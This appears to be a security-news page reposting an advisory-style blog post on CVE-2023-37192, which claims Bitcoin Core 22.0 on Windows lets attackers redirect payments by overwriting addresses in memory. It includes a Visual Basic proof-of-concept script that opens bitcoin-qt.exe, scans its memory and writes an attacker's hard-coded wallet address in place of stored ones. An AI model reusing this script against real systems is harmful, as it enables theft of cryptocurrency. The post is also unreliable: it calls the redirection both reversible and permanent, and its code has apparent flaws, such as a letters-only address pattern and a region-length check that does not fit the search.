Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-37192: The Bitcoin app is vulnerable to hackers!

Memory management and protection issues in Bitcoin Core v22 allows attackers to modify the stored sending address within the app’s memory, potentially allowing them to redirect Bitcoin transactions to wallets of their own choosing.

CVE
Open in Source
#vulnerability#windows#auth

The Bitcoin app is vulnerable to hackers!

Description

Bitcoin Core Latest version 22.0 suffers from a memory management issue that enables attackers to redirect funds to their own Bitcoin address.

DATE(S) ISSUED: 06/22/2023

RISK: Critical

Businesses:

Large and medium Bitcoin miners HIGH

Home Users: LOW

Method: Remote thread execution

OVERVIEW:

The Bitcoin app on Windows is currently facing issues related to memory management and memory protection. These vulnerabilities allow attackers to modify the stored sending address within the app’s memory, ultimately leading to the redirection of Bitcoin transactions to their own wallets.

Attackers Method:

The Bitcoin app is suffering from memory management issues, allowing attackers to open bitcoin’s process and search for Bitcoin wallet addresses stored in the memory. While Bitcoin uses the SHA-256 hashing algorithm to encrypt the data stored in the blocks on the blockchain, the BTC addresses themselves are not encrypted in the memory.

When a transaction occurs on the Bitcoin blockchain, it takes place through the utilization of public addresses. These public addresses are stored within the Bitcoin app prior to initiating the process.

An attacker can simply search for these BTC addresses, which consist of a string of 26-35 letters and numbers, enabling them to easily locate all the Bitcoin wallets stored in the Bitcoin app and replace them with their own.

When an attacker replaces the public address, it can result in a straightforward redirection of Bitcoin transactions to their own wallets. Due to the inherent nature of Bitcoin, this process is reversible.

This method closely resembles the widely-known point-of-sale malware called Tinypos.

My research about Tinypos can be found here:

https://securitynews.sonicwall.com/xmlpost/tinypos-a-new-multi-component-pos-family-actively-spreading-in-the-wild/

To my understanding, we can expect to see an increase in the prevalence of Bitcoin point-of-sale (POS) malware in the near future!

The major difference between Tinypos and Bitcoin malware is that Bitcoin operates in a decentralized manner without a central authority. Therefore, if you become a victim of an attack, your funds will be permanently lost!

Video of Attack:

https://www.youtube.com/watch?v=oEl4M1oZim0

In this video, I used an app called Cheat Engine to demonstrate how hacking a Bitcoin wallet works. As you can see in the video, I created a Bitcoin sending address under my name. An attacker can easily gain access to the Bitcoin memory app and replace it with another BTC wallet, causing all funds to be transferred to their own wallet during any transaction!

POC:

replace_hash = “bc1pkwjlvljdq6huzk85d8z695v26e93dd1m0upqumkncmx640dpdu4suyukmt” ' attacker’s hash

Private Declare Function OpenProcess Lib “kernel32” (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long

Private Declare Function GetWindowThreadProcessId Lib “user32” (ByVal hWnd As Long, lpdwProcessId As Long) As Long

Private Declare Function ReadProcessMemory Lib “kernel32” (ByVal hProcess As Long, ByVal lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long

Private Declare Function WriteProcessMemory Lib “kernel32” (ByVal hProcess As Long, ByVal lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long

Private Declare Function VirtualQueryEx Lib “kernel32” (ByVal hProcess As Long, ByVal lpAddress As Long, lpBuffer As MEMORY_BASIC_INFORMATION, ByVal dwLength As Long) As Long

Private Declare Function CloseHandle Lib “kernel32” (ByVal hObject As Long) As Long

Private Const PROCESS_ALL_ACCESS As Long = &H1F0FFF

Private Const WM_GETTEXT As Long = &HD

Private Const WM_SETTEXT As Long = &HC

Private Const MEM_COMMIT As Long = &H1000

Private Const MEM_PRIVATE As Long = &H20000

Private Const PAGE_READWRITE As Long = &H4

Private Type MEMORY_BASIC_INFORMATION

BaseAddress As Long

AllocationBase As Long

AllocationProtect As Long

RegionSize As Long

State As Long

Protect As Long

Type As Long

End Type

Private Sub Bitcoin_hack ()

Dim hWnd As Long

Dim processId As Long

Dim hProcess As Long

Dim buffer As String

Dim processName As String

Dim searchString As String

Dim replacementString As String

processName = "bitcoin-qt.exe" 

searchString = "^\[A-Za-z\]{26,35}$" ' Pattern for strings with 26-35 letters Bitcoin address

replacementString = replace\_hash 

hWnd = FindWindow(vbNullString, processName)

If hWnd <> 0 Then

    ' Get the process ID

    GetWindowThreadProcessId hWnd, processId

    ' Open the process

    hProcess = OpenProcess(PROCESS\_ALL\_ACCESS, 0, processId)

    If hProcess <> 0 Then

        Dim lpMemInfo As MEMORY\_BASIC\_INFORMATION

        Dim lpBuffer As String

        Dim lpAddress As Long

        Dim bytesRead As Long

        lpAddress = 0 ' Start at the beginning of the process memory

        Do While VirtualQueryEx(hProcess, lpAddress, lpMemInfo, Len(lpMemInfo)) <> 0

            If (lpMemInfo.State = MEM\_COMMIT) And (lpMemInfo.Type = MEM\_PRIVATE) And (lpMemInfo.Protect = PAGE\_READWRITE) Then

                ' Allocate a buffer to read the memory

                lpBuffer = Space(lpMemInfo.RegionSize)

                ' Read the memory

                ReadProcessMemory hProcess, ByVal lpMemInfo.BaseAddress, ByVal lpBuffer, lpMemInfo.RegionSize, bytesRead

                ' Check if the buffer contains a matching string

                If Len(lpBuffer) >= 26 And Len(lpBuffer) <= 35 And RegExpMatch(lpBuffer, searchString) Then

                    Dim writeBuffer As String

                    writeBuffer = RegExpReplace(lpBuffer, searchString, replacementString)

                    ' Write the modified text

                    WriteProcessMemory hProcess, ByVal lpMemInfo.BaseAddress, ByVal StrPtr(writeBuffer), Len(writeBuffer), 0

                End If

            End If

            ' Move to the next memory region

            lpAddress = lpMemInfo.BaseAddress + lpMemInfo.RegionSize

        Loop

        ' Close the process handle

        CloseHandle hProcess

    Else

        MsgBox "Failed to open the process.", vbCritical

    End If

Else

    MsgBox "The process could not be found.", vbCritical

End If

End Sub

Private Function RegExpMatch(ByVal text As String, ByVal pattern As String) As Boolean

Dim regExp As Object

Set regExp = CreateObject("VBScript.RegExp")

With regExp

    .Global = True

    .IgnoreCase = True

    .Pattern = pattern

End With

RegExpMatch = regExp.Test(text)

End Function

Private Function RegExpReplace(ByVal text As String, ByVal pattern As String, ByVal replacement As String) As String

Dim regExp As Object

Set regExp = CreateObject("VBScript.RegExp")

With regExp

    .Global = True

    .IgnoreCase = True

    .Pattern = pattern

End With

RegExpReplace = regExp.Replace(text, replacement)

End Function

Summary:

Use Cold Wallets until they fix this!

Questions ?

[email protected]

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE